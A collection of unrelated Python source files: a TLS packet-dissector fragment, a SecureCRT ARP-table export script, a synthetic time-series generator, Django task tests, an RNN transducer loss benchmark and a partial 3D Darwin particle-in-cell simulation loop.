# SSLv2 Header
self.guessed_next_layer = SSLv2Record
else:
self.guessed_next_layer = TLSRecord
self.fields_desc = [PacketListField("records", None, self.guessed_next_layer)]
return s
def do_dissect(self, s):
pos = 0
cls = self.guessed_next_layer # FIXME: detect DTLS
cls_len = len(cls())
try:
while pos <= len(s):
# consume payloads and add them to records list
record = cls(s[pos:], _internal=1) # FIXME: performance
layer_len = cls_len + record.length
if layer_len == None:
break
record = cls(s[pos:pos + layer_len])
pos += layer_len
# print pos,len(s)
self.records.append(record)
except Exception, e:
pass
# raise e
return s[pos:]
def encrypt(self, master_secret):
pass
def encrypt_stream(self):
'''
HMAC_hash(MAC_write_secret, seq_num + TLSCompressed.type +
TLSCompressed.version + TLSCompressed.length +
TLSCompressed.fragment));
'''
pass
def decrypt(self, master_secret): pass
def compress(self): pass
def decompress(self): pass
# bind magic
bind_layers(TCP, SSL, dport=443)
bind_layers(TCP, SSL, sport=443)
bind_layers(UDP, SSL, dport=4433)
bind_layers(UDP, SSL, sport=4433)
# TLSRecord
bind_layers(TLSRecord, TLSChangeCipherSpec, {'content_type':0x14})
bind_layers(TLSRecord, TLSHeartBeat, {'content_type':0x18})
bind_layers(TLSRecord, TLSAlert, {'content_type':0x15})
bind_layers(TLSRecord, TLSHandshake, {'content_type':0x16})
# --> handshake proto
bind_layers(TLSHandshake, TLSClientHello, {'type':0x01})
bind_layers(TLSHandshake, TLSServerHello, {'type':0x02})
bind_layers(TLSHandshake, TLSCertificateList, {'type':0x0b})
bind_layers(TLSHandshake, TLSClientKeyExchange, {'type':0x10})
bind_layers(TLSHandshake, TLSServerKeyExchange, {'type':0x0c})
bind_layers(TLSHandshake, TLSFinished, {'type':0x20})
# <---
bind_layers(TLSServerKeyExchange, TLSKexParamEncryptedPremasterSecret)
bind_layers(TLSClientKeyExchange, TLSKexParamEncryptedPremasterSecret)
bind_layers(TLSServerKeyExchange, TLSKexParamDH)
bind_layers(TLSClientKeyExchange, TLSKexParamDH)
# --> extensions
bind_layers(TLSExtension, TLSServerNameIndication, {'type': 0x0000})
bind_layers(TLSExtension, TLSExtMaxFragmentLength, {'type': 0x0001})
bind_layers(TLSExtension, TLSExtCertificateURL, {'type': 0x0002})
bind_layers(TLSExtension, TLSExtECPointsFormat, {'type': 0x000b})
bind_layers(TLSExtension, TLSExtEllipticCurves, {'type': 0x000a})
# bind_layers(TLSExtension,Raw,{'type': 0x0023})
bind_layers(TLSExtension, TLSExtHeartbeat, {'type': 0x000f})
# <--
# DTLSRecord
bind_layers(DTLSRecord, DTLSHandshake, {'content_type':0x16})
bind_layers(DTLSHandshake, DTLSClientHello, {'type':0x01})
# SSLv2
bind_layers(SSLv2Record, SSLv2ServerHello, {'content_type':0x04})
bind_layers(SSLv2Record, SSLv2ClientHello, {'content_type':0x01})
bind_layers(SSLv2Record, SSLv2ClientMasterKey, {'content_type':0x02})
|
<reponame>tylersiemers/securecrt-tools<gh_stars>0
# $language = "python"
# $interface = "1.0"
import os
import sys
import logging
# Add script directory to the PYTHONPATH so we can import our modules (only if run from SecureCRT)
if 'crt' in globals():
script_dir, script_name = os.path.split(crt.ScriptFullName)
if script_dir not in sys.path:
sys.path.insert(0, script_dir)
else:
script_dir, script_name = os.path.split(os.path.realpath(__file__))
# Now we can import our custom modules
from securecrt_tools import scripts
from securecrt_tools import utilities
# Create global logger so we can write debug messages from any function (if debug mode setting is enabled in settings).
logger = logging.getLogger("securecrt")
logger.debug("Starting execution of {0}".format(script_name))
# ################################################ SCRIPT LOGIC ###################################################
def script_main(session):
"""
| SINGLE device script
| Author: <NAME>
| Email: <EMAIL>
This script will capture the ARP table of the attached device and output the results as a CSV file. While this
script can be used to capture the ARP table, the primary purpose is to create the ARP associations that the
"s_switchport_mapping.py" script can use to map which MAC and IP addresses are connected to each device.
:param session: A subclass of the sessions.Session object that represents this particular script session (either
SecureCRTSession or DirectSession)
:type session: sessions.Session
"""
# Get script object that owns this session, so we can check settings, get textfsm templates, etc
script = session.script
# Start session with device, i.e. modify term parameters for better interaction (assuming already connected)
session.start_cisco_session()
# Validate device is running a supported OS
session.validate_os(["IOS", "NXOS"])
# Prompt for the VRF
selected_vrf = script.prompt_window("Enter the VRF name.\n(Leave blank for default VRF)")
if selected_vrf == "":
selected_vrf = None
logger.debug("Set VRF to '{0}'".format(selected_vrf))
# Select template file based on network OS
if session.os == "IOS":
send_cmd = "show ip arp"
template_file = script.get_template("cisco_ios_show_ip_arp.template")
else:
send_cmd = "show ip arp detail"
template_file = script.get_template("cisco_nxos_show_ip_arp_detail.template")
logger.debug("Command set to '{0}'".format(send_cmd))
# If a VRF was specified, update the commands and outputs to reflect this.
if selected_vrf:
send_cmd = send_cmd + " vrf {0}".format(selected_vrf)
script.hostname = script.hostname + "-VRF-{0}".format(selected_vrf)
logger.debug("Updated hostname to: '{0}'".format(script.hostname))
# Get "show ip arp" data
raw_arp = session.get_command_output(send_cmd)
# Process with TextFSM
logger.debug("Using template: '{0}'".format(template_file))
fsm_results = utilities.textfsm_parse_to_list(raw_arp, template_file, add_header=True)
# Generate filename and output data as CSV
output_filename = session.create_output_filename("arp", ext=".csv")
utilities.list_of_lists_to_csv(fsm_results, output_filename)
# Return terminal parameters back to the original state.
session.end_cisco_session()
# ################################################ SCRIPT LAUNCH ###################################################
# If this script is run from SecureCRT directly, use the SecureCRT specific class
if __name__ == "__builtin__":
# Initialize script object
crt_script = scripts.CRTScript(crt)
# Get session object for the SecureCRT tab that the script was launched from.
crt_session = crt_script.get_main_session()
# Run script's main logic against our session
script_main(crt_session)
# Shutdown logging after
logging.shutdown()
# If the script is being run directly, use the simulation class
elif __name__ == "__main__":
# Initialize script object
direct_script = scripts.DebugScript(os.path.realpath(__file__))
# Get a simulated session object to pass into the script.
sim_session = direct_script.get_main_session()
# Run script's main logic against our session
script_main(sim_session)
# Shutdown logging after
logging.shutdown()
|
<gh_stars>0
###########################
# Latent ODEs for Irregularly-Sampled Time Series
# Author: <NAME>
###########################
# Create a synthetic dataset
from __future__ import absolute_import, division
from __future__ import print_function
import os
import matplotlib
if os.path.exists("/Users/yulia"):
matplotlib.use("TkAgg")
else:
matplotlib.use("Agg")
import numpy as np
import numpy.random as npr
from scipy.special import expit as sigmoid
import pickle
import matplotlib.pyplot as plt
import matplotlib.image
import torch
import lib.utils as utils
# ======================================================================================
def get_next_val(init, t, tmin, tmax, final=None):
if final is None:
return init
val = init + (final - init) / (tmax - tmin) * t
return val
def generate_periodic(
time_steps,
init_freq,
init_amplitude,
starting_point,
final_freq=None,
final_amplitude=None,
phi_offset=0.0,
):
tmin = time_steps.min()
tmax = time_steps.max()
data = []
t_prev = time_steps[0]
phi = phi_offset
for t in time_steps:
dt = t - t_prev
amp = get_next_val(init_amplitude, t, tmin, tmax, final_amplitude)
freq = get_next_val(init_freq, t, tmin, tmax, final_freq)
phi = phi + 2 * np.pi * freq * dt # integrate to get phase
y = amp * np.sin(phi) + starting_point
t_prev = t
data.append([t, y])
return np.array(data)
def assign_value_or_sample(value, sampling_interval=[0.0, 1.0]):
if value is None:
int_length = sampling_interval[1] - sampling_interval[0]
return np.random.random() * int_length + sampling_interval[0]
else:
return value
class TimeSeries:
def __init__(self, device=torch.device("cpu")):
self.device = device
self.z0 = None
def init_visualization(self):
self.fig = plt.figure(figsize=(10, 4), facecolor="white")
self.ax = self.fig.add_subplot(111, frameon=False)
plt.show(block=False)
def visualize(self, truth):
self.ax.plot(truth[:, 0], truth[:, 1])
def add_noise(self, traj_list, time_steps, noise_weight):
n_samples = traj_list.size(0)
# Add noise to all the points except the first point
n_tp = len(time_steps) - 1
noise = np.random.sample((n_samples, n_tp))
noise = torch.Tensor(noise).to(self.device)
traj_list_w_noise = traj_list.clone()
# Dimension [:,:,0] is a time dimension -- do not add noise to that
traj_list_w_noise[:, 1:, 0] += noise_weight * noise
return traj_list_w_noise
class Periodic_1d(TimeSeries):
def __init__(
self,
device=torch.device("cpu"),
init_freq=0.3,
init_amplitude=1.0,
final_amplitude=10.0,
final_freq=1.0,
z0=0.0,
):
"""
If some of the parameters (init_freq, init_amplitude, final_amplitude, final_freq) is not provided, it is randomly sampled.
For now, all the time series share the time points and the starting point.
"""
super(Periodic_1d, self).__init__(device)
self.init_freq = init_freq
self.init_amplitude = init_amplitude
self.final_amplitude = final_amplitude
self.final_freq = final_freq
self.z0 = z0
def sample_traj(
self, time_steps, n_samples=1, noise_weight=1.0, cut_out_section=None
):
"""
Sample periodic functions.
"""
traj_list = []
for i in range(n_samples):
init_freq = assign_value_or_sample(self.init_freq, [0.4, 0.8])
if self.final_freq is None:
final_freq = init_freq
else:
final_freq = assign_value_or_sample(self.final_freq, [0.4, 0.8])
init_amplitude = assign_value_or_sample(self.init_amplitude, [0.0, 1.0])
final_amplitude = assign_value_or_sample(self.final_amplitude, [0.0, 1.0])
noisy_z0 = self.z0 + np.random.normal(loc=0.0, scale=0.1)
traj = generate_periodic(
time_steps,
init_freq=init_freq,
init_amplitude=init_amplitude,
starting_point=noisy_z0,
final_amplitude=final_amplitude,
final_freq=final_freq,
)
# Cut the time dimension
traj = np.expand_dims(traj[:, 1:], 0)
traj_list.append(traj)
# shape: [n_samples, n_timesteps, 2]
# traj_list[:,:,0] -- time stamps
# traj_list[:,:,1] -- values at the time stamps
traj_list = np.array(traj_list)
traj_list = torch.Tensor().new_tensor(traj_list, device=self.device)
traj_list = traj_list.squeeze(1)
traj_list = self.add_noise(traj_list, time_steps, noise_weight)
return traj_list
|
from unittest.mock import patch
from django.contrib.auth import get_user_model
from django.test import TestCase
from ohq.models import Course, Membership, Question, Queue, Semester
from ohq.tasks import sendUpNextNotificationTask
User = get_user_model()
@patch("ohq.tasks.sendUpNextNotification")
class sendUpNextNotificationTaskTestCase(TestCase):
def setUp(self):
self.semester = Semester.objects.create(year=2020, term=Semester.TERM_SUMMER)
self.course = Course.objects.create(
course_code="000", department="Penn Labs", semester=self.semester
)
self.queue = Queue.objects.create(name="Queue", course=self.course)
self.ta = User.objects.create(username="ta")
self.student_one = User.objects.create(username="student_one")
self.student_two = User.objects.create(username="student_two")
self.student_three = User.objects.create(username="student_three")
self.student_four = User.objects.create(username="student_four")
Membership.objects.create(course=self.course, user=self.ta, kind=Membership.KIND_TA)
Membership.objects.create(
course=self.course, user=self.student_one, kind=Membership.KIND_STUDENT
)
Membership.objects.create(
course=self.course, user=self.student_two, kind=Membership.KIND_STUDENT
)
Membership.objects.create(
course=self.course, user=self.student_three, kind=Membership.KIND_STUDENT
)
Membership.objects.create(
course=self.course, user=self.student_four, kind=Membership.KIND_STUDENT
)
Question.objects.create(queue=self.queue, asked_by=self.student_one, text="Q1")
Question.objects.create(queue=self.queue, asked_by=self.student_two, text="Q2")
Question.objects.create(queue=self.queue, asked_by=self.student_three, text="Q3")
Question.objects.create(queue=self.queue, asked_by=self.student_four, text="Q4")
def test_small_queue(self, mock_send):
"""
Ensure a text is not sent when less than 3 questions are in the queue.
"""
Question.objects.all().first().delete()
Question.objects.all().first().delete()
sendUpNextNotificationTask.s(self.queue.id).apply()
mock_send.assert_not_called()
def test_should_not_send(self, mock_send):
"""
Ensure a text is not sent when the 3rd question shouldn't be send a notification.
"""
sendUpNextNotificationTask.s(self.queue.id).apply()
mock_send.assert_not_called()
def test_not_verified(self, mock_send):
"""
Ensure a text is not sent when the person who asked the 3rd question hasn't verified
(or added) a phone number.
"""
question = Question.objects.get(asked_by=self.student_three)
question.should_send_up_soon_notification = True
question.save()
sendUpNextNotificationTask.s(self.queue.id).apply()
mock_send.assert_not_called()
def test_send(self, mock_send):
"""
Send an notification SMS when all criteria is met
"""
self.student_three.profile.sms_verified = True
phone_number = "+15555555555"
self.student_three.profile.phone_number = phone_number
self.student_three.save()
question = Question.objects.get(asked_by=self.student_three)
question.should_send_up_soon_notification = True
question.save()
sendUpNextNotificationTask.s(self.queue.id).apply()
mock_send.assert_called()
self.assertEqual(1, len(mock_send.mock_calls))
self.assertEqual(self.student_three, mock_send.call_args[0][0])
self.assertEqual(self.course, mock_send.call_args[0][1])
|
"""
Tests for the C implementation of the sequence transducer.
From outside the package directory, run
`python -m transducer.test.`
"""
from __future__ import division
from __future__ import print_function
import argparse
import numpy as np
import time
import torch
import torch.autograd as autograd
import torch.nn as nn
import os
import subprocess
from warprnnt_pytorch import RNNTLoss
from transducer_np import RNNTLoss as rnntloss
parser = argparse.ArgumentParser(description='MXNet RNN Transducer Test.')
parser.add_argument('B', type=int, default=1, help='batch size')
parser.add_argument('T', type=int, default=300, help='time step')
parser.add_argument('U', type=int, default=100, help='prediction step')
parser.add_argument('V', type=int, default=60, help='vocab size')
parser.add_argument('--np', default=False, action='store_true', help='use numpy loss')
parser.add_argument('--add', default=False, action='store_true', help='add_network')
args = parser.parse_args()
fn = rnntloss() if args.np else RNNTLoss()
def get_gpu_memory_map():
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
gpu_memory = [int(x) for x in result.strip().split('\n')]
gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))
return gpu_memory_map
def wrap_and_call():
print('initial gpu memory usage: {}'.format(get_gpu_memory_map()))
batch_size = args.B
vocab_size = args.V
input_len = args.T
output_len = args.U
trans_acts = torch.zeros(batch_size, input_len, vocab_size).uniform_().cuda()
pred_acts = torch.zeros(batch_size, output_len + 1, vocab_size).uniform_().cuda()
labels = torch.zeros(batch_size, output_len).uniform_(1, vocab_size-1).int().cuda()
trans_acts = autograd.Variable(trans_acts, requires_grad=True)
pred_acts = autograd.Variable(pred_acts, requires_grad=True)
labels = autograd.Variable(labels)
lengths = autograd.Variable(torch.IntTensor([input_len] * batch_size).cuda())
label_lengths = autograd.Variable(torch.IntTensor([output_len - 1] * batch_size).cuda())
gpu_memory = batch_size * (input_len + (output_len + 1)) * vocab_size * 4
print('before compute gradient, gpu memory assume: {:.3f}GB = {:.3f}MB, actual {}'.format(gpu_memory / (1<<30), gpu_memory / (1<<20), get_gpu_memory_map()))
if args.add:
start = time.time()
costs = fn(trans_acts, pred_acts, labels, lengths, label_lengths)
end = time.time()
print('cpu loss time: {:.3f} s\n'.format(end-start))
# grads to trans_acts, pred_acts
gpu_memory += batch_size * (input_len + (output_len + 1)) * vocab_size * 4
else:
# joint
acts = trans_acts.unsqueeze(dim=2) + pred_acts.unsqueeze(dim=1)
log_probs = nn.functional.log_softmax(acts, dim=3)
start = time.time()
costs = fn(log_probs, labels, lengths, label_lengths)
end = time.time()
print('add network cpu loss time: {:.3f} s\n'.format(end-start))
# acts & log_probs & grad to log_probs
gpu_memory += batch_size * input_len * (output_len + 1) * vocab_size * 4 * 3
print('after compute gradient, gpu memory assume: {:.3f}GB = {:.3f}MB, actual {}'.format(gpu_memory / (1<<30), gpu_memory / (1<<20), get_gpu_memory_map()))
start = time.time()
costs.backward()
end = time.time()
# grads to trans_acts, pred_acts
gpu_memory += batch_size * (input_len + (output_len + 1)) * vocab_size * 4
if not args.add:
# grads to acts
gpu_memory += batch_size * input_len * (output_len + 1) * vocab_size * 4
# grad to log_probs is not retained
# if not args.add:
# gpu_memory -= batch_size * input_len * (output_len + 1) * vocab_size * 4
print('after backward, gpu memory assume: {:.3f}GB = {:.3f}MB, actual {}'.format(gpu_memory / (1<<30), gpu_memory / (1<<20), get_gpu_memory_map()))
print('backward time: {:.3f} s'.format(end-start))
print('GPU memory comsume: {:.3f}GB = {:.3f}MB'.format(gpu_memory / (1<<30), gpu_memory / (1<<20)))
print()
torch.cuda.empty_cache()
def time_test(blank=0):
start = time.time()
iters = 1
for _ in range(iters):
wrap_and_call()
end = time.time()
print("Time per iteration: {:.3f}(s)".format((end-start)/iters))
if __name__ == "__main__":
time_test()
|
<reponame>gcasabona/cuda<gh_stars>10-100
#-----------------------------------------------------------------------
# Skeleton 3D Darwin PIC code
# written by <NAME>, <NAME>, and <NAME>, UCLA
import math
import numpy
from fdpush3 import *
from dtimer import *
int_type = numpy.int32
double_type = numpy.float64
float_type = numpy.float32
complex_type = numpy.complex64
# indx/indy/indz = exponent which determines grid points in x/y/z
# direction: nx = 2**indx, ny = 2**indy, nz = 2**indz.
indx = 7; indy = 7; indz = 7
# npx/npy/npz = number of electrons distributed in x/y/z direction.
npx = 384; npy = 384; npz = 384
# ndim = number of velocity coordinates = 3
ndim = 3
# tend = time at end of simulation, in units of plasma frequency.
# dt = time interval between successive calculations.
# qme = charge on electron, in units of e.
tend = 10.0; dt = 0.1; qme = -1.0
# vtx/vty/vtz = thermal velocity of electrons in x/y/z direction
vtx = 1.0; vty = 1.0; vtz = 1.0
# vx0/vy0/vz0 = drift velocity of electrons in x/y/z direction
vx0 = 0.0; vy0 = 0.0; vz0 = 0.0
# ax/ay/az = smoothed particle size in x/y/z direction
# ci = reciprocal of velocity of light.
ax = .912871; ay = .912871; az = .912871; ci = 0.1
# idimp = number of particle coordinates = 6
# ipbc = particle boundary condition: 1 = periodic
# sortime = number of time steps between standard electron sorting
idimp = 6; ipbc = 1; sortime = 20
# omx/omy/omz = magnetic field electron cyclotron frequency in x/y/z
omx = 0.4; omy = 0.0; omz = 0.0
# ndc = number of corrections in darwin iteration
ndc = 1
# wke/we = particle kinetic/electrostatic field energy
# wf/wm/wt = magnetic field/transverse electric field/total energy
wke = numpy.zeros((1),float_type)
we = numpy.zeros((1),float_type)
wf = numpy.zeros((1),float_type)
wm = numpy.zeros((1),float_type)
wt = numpy.zeros((1),float_type)
zero = 0.0
# declare scalars for standard code
wpmax = numpy.empty((1),float_type)
wpmin = numpy.empty((1),float_type)
# declare and initialize timing data
itime = numpy.empty((4),numpy.int32)
tdpost = 0.0; tguard = 0.0; tfft = 0.0; tfield = 0.0
tdjpost = 0.0; tdcjpost = 0.0; tpush = 0.0; tsort = 0.0
dtime = numpy.empty((1),double_type)
# initialize scalars for standard code
# np = total number of particles in simulation
# nx/ny/nz = number of grid points in x/y/z direction
np = npx*npy*npz; nx = int(math.pow(2,indx))
ny = int(math.pow(2,indy)); nz = int(math.pow(2,indz))
nxh = int(nx/2); nyh = max(1,int(ny/2)); nzh = max(1,int(nz/2))
nxe = nx + 2; nye = ny + 1; nze = nz + 1; nxeh = int(nxe/2)
nxyzh = int(max(nx,ny,nz)/2); nxhyz = max(nxh,ny,nz)
ny1 = ny + 1; nyz1 = ny1*(nz + 1)
# nloop = number of time steps in simulation
# ntime = current time step
nloop = int(tend/dt + .0001); ntime = 0
# mdim = dimension of amu array
mdim = 2*ndim
qbme = qme
affp = float(nx)*float(ny)*float(nz)/float(np)
# allocate data for standard code
# part, part2 = particle arrays
part = numpy.empty((idimp,np),float_type,'F')
if (sortime > 0):
part2 = numpy.empty((idimp,np),float_type,'F')
# qe = electron charge density with guard cells
qe = numpy.empty((nxe,nye,nze),float_type,'F')
# cue = electron current density with guard cells
cue = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# dcu = acceleration density with guard cells
dcu = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# cus = smoothed transverse electric field with guard cells
cus = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# amu = momentum flux with guard cells
amu = numpy.empty((mdim,nxe,nye,nze),float_type,'F')
# exyze = smoothed total electric field with guard cells
exyze = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# fxyze = smoothed longitudinal electric field with guard cells
fxyze = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# bxyze = smoothed magnetic field with guard cells
bxyze = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# ffc, ffe = form factor arrays for poisson solvers
ffc = numpy.empty((nxh,nyh,nzh),complex_type,'F')
ffe = numpy.empty((nxh,nyh,nzh),complex_type,'F')
# mixup = bit reverse table for FFT
mixup = numpy.empty((nxhyz),int_type,'F')
# sct = sine/cosine table for FFT
sct = numpy.empty((nxyzh),complex_type,'F')
# npic = scratch array for reordering particles
npic = numpy.empty((nyz1),int_type,'F')
# ss = scratch array for WFFT3RN
ss = numpy.empty((mdim,nxeh),complex_type,'F')
# prepare fft tables
wfft3rinit(mixup,sct,indx,indy,indz,nxhyz,nxyzh)
# calculate form factor: ffc
isign = 0
pois33(qe,fxyze,isign,ffc,ax,ay,az,affp,we,nx,ny,nz,nxeh,nye,nze,nxh,
nyh,nzh)
# initialize electrons
distr3(part,vtx,vty,vtz,vx0,vy0,vz0,npx,npy,npz,idimp,np,nx,ny,nz,ipbc)
# find maximum and minimum initial electron density
qe.fill(0.0)
gpost3l(part,qe,qme,np,idimp,nxe,nye,nze)
aguard3l(qe,nx,ny,nz,nxe,nye,nze)
fwpminmx3(qe,qbme,wpmax,wpmin,nx,ny,nz,nxe,nye,nze)
wpm = 0.5*(wpmax[0] + wpmin[0])*affp
# accelerate convergence: update wpm
if (wpm <= 10.0):
wpm = 0.75*wpm
print "wpm=",wpm
q2m0 = wpm/affp
# calculate form factor: ffe
isign = 0
epois33(dcu,cus,isign,ffe,ax,ay,az,affp,wpm,ci,wf,nx,ny,nz,nxeh,nye,nze,
nxh,nyh,nzh)
# initialize transverse electric field
cus.fill(0.0)
# * * * start main iteration loop * * *
for ntime in xrange(0,nloop):
# print "ntime = ", ntime
# deposit current with standard procedure: updates cue
dtimer(dtime,itime,-1)
cue.fill(0.0)
gjpost3l(part,cue,qme,zero,np,idimp,nx,ny,nz,nxe,nye,nze,ipbc)
dtimer(dtime,itime,1)
time = float(dtime)
tdjpost = tdjpost + time
# deposit charge with standard procedure: updates qe
dtimer(dtime,itime,-1)
qe.fill(0.0)
gpost3l(part,qe,qme,np,idimp,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tdpost = tdpost + time
# add guard cells with standard procedure: updates qe, cue
dtimer(dtime,itime,-1)
aguard3l(qe,nx,ny,nz,nxe,nye,nze)
acguard3l(cue,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tguard = tguard + time
# transform charge to fourier space with standard procedure: updates qe
dtimer(dtime,itime,-1)
isign = -1
wfft3rx(qe,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# calculate longitudinal force/charge in fourier space with standard
# procedure: updates fxyze, we
dtimer(dtime,itime,-1)
isign = -1
pois33(qe,fxyze,isign,ffc,ax,ay,az,affp,we,nx,ny,nz,nxeh,nye,nze,nxh,
nyh,nzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# transform longitudinal electric force to real space with standard
# procedure: updates fxyze
dtimer(dtime,itime,-1)
isign = 1
wfft3r3(fxyze,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# transform current to fourier space with standard procedure: update cue
dtimer(dtime,itime,-1)
isign = -1
wfft3r3(cue,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# take transverse part of current with standard procedure: updates cue
dtimer(dtime,itime,-1)
cuperp3(cue,nx,ny,nz,nxeh,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# calculate magnetic field in fourier space with standard procedure:
# updates bxyze, wm
dtimer(dtime,itime,-1)
bbpois33(cue,bxyze,ffc,ci,wm,nx,ny,nz,nxeh,nye,nze,nxh,nyh,nzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# transform magnetic force to real space with standard procedure:
# updates bxyze
dtimer(dtime,itime,-1)
isign = 1
wfft3r3(bxyze,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# add constant to magnetic field with standard procedure: updates bxyze
dtimer(dtime,itime,-1)
baddext3(bxyze,omx,omy,omz,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# copy guard cells with standard procedure: updates fxyze, bxyze
dtimer(dtime,itime,-1)
cguard3l(fxyze,nx,ny,nz,nxe,nye,nze)
cguard3l(bxyze,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tguard = tguard + time
# add longitudinal and old transverse electric fields with standard
# procedure: updates exyze
dtimer(dtime,itime,-1)
addvrfield3(exyze,cus,fxyze,ndim,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# deposit electron acceleration density and momentum flux with standard
# procedure: updates dcu, amu
dtimer(dtime,itime,-1)
dcu.fill(0.0); amu.fill(0.0)
gdjpost3l(part,exyze,bxyze,dcu,amu,qme,qbme,dt,idimp,np,nxe,nye,nze)
# add old scaled electric field with standard procedure: updates dcu
ascfguard3l(dcu,cus,q2m0,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tdcjpost = tdcjpost + time
# add guard cells with standard procedure: updates dcu, amu
dtimer(dtime,itime,-1)
acguard3l(dcu,nx,ny,nz,nxe,nye,nze)
amcguard3l(amu,nx,ny,nz,nxe,nye,nze,mdim)
dtimer(dtime,itime,1)
time = float(dtime)
tguard = tguard + time
# transform acceleration density and momentum flux to fourier space
# with standard procedure: updates dcu, amu
dtimer(dtime,itime,-1)
isign = -1
wfft3r3(dcu,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
wfft3rn(amu,ss,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,mdim,
nxhyz,nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# take transverse part of time derivative of current with standard
# procedure: updates dcu
dtimer(dtime,itime,-1)
adcuperp3(dcu,amu,nx,ny,nz,nxeh,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# calculate transverse electric field with standard procedure:
# updates cus, wf
dtimer(dtime,itime,-1)
isign = -1
epois33(dcu,cus,isign,ffe,ax,ay,az,affp,wpm,ci,wf,nx,ny,nz,nxeh,nye,
nze,nxh,nyh,nzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# transform transverse electric field to real space with standard
# procedure: updates cus
dtimer(dtime,itime,-1)
isign = 1
wfft3r3(cus,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# copy guard cells with standard procedure: updates cus
dtimer(dtime,itime,-1)
cguard3l(cus,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tguard = tguard + time
# add longitudinal and transverse electric fields with standard
# procedure: exyze = cus + fxyze, updates exyze
# cus needs to be retained for next time step
dtimer(dtime,itime,-1)
addvrfield3(exyze,cus,fxyze,ndim,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# inner iteration loop
for k in xrange(0,ndc):
# deposit electron current and acceleration density and momentum flux
# with standard procedure: updates cue, dcu, amu
dtimer(dtime,itime,-1)
cue.fill(0.0); dcu.fill(0.0); amu.fill(0.0)
gdcjpost3l(part,exyze,bxyze,cue,dcu,amu,qme,qbme,dt,idimp,np,nxe,
nye,nze)
# add caled electric field with standard procedure: updates dcu
ascfguard3l(dcu,cus,q2m0,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tdcjpost = tdcjpost + time
# add guard cells for current, acceleration density, and momentum flux
# with standard procedure: updates cue, dcu, amu
dtimer(dtime,itime,-1)
acguard3l(cue,nx,ny,nz,nxe,nye,nze)
acguard3l(dcu,nx,ny,nz,nxe,nye,nze)
amcguard3l(amu,nx,ny,nz,nxe,nye,nze,mdim)
dtimer(dtime,itime,1)
time = float(dtime)
tguard = tguard + time
# transform current to fourier space with standard procedure: update cue
dtimer(dtime,itime,-1)
isign = -1
wfft3r3(cue,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# take transverse part of current with standard procedure: updates cue
dtimer(dtime,itime,-1)
cuperp3(cue,nx,ny,nz,nxeh,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# calculate magnetic field in fourier space with standard procedure:
# updates bxyze, wm
dtimer(dtime,itime,-1)
bbpois33(cue,bxyze,ffc,ci,wm,nx,ny,nz,nxeh,nye,nze,nxh,nyh,nzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# transform magnetic force to real space with standard procedure:
# updates bxyze
dtimer(dtime,itime,-1)
isign = 1
wfft3r3(bxyze,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# add constant to magnetic field with standard procedure: updates bxyze
dtimer(dtime,itime,-1)
baddext3(bxyze,omx,omy,omz,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# transform acceleration density and momentum flux to fourier space
# with standard procedure: updates dcu, amu
dtimer(dtime,itime,-1)
isign = -1
wfft3r3(dcu,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
nxyzh)
wfft3rn(amu,ss,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,mdim,
nxhyz,nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# take transverse part of time derivative of current with standard
# procedure: updates dcu
dtimer(dtime,itime,-1)
adcuperp3(dcu,amu,nx,ny,nz,nxeh,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# calculate transverse electric field with standard procedure:
# updates cus, wf
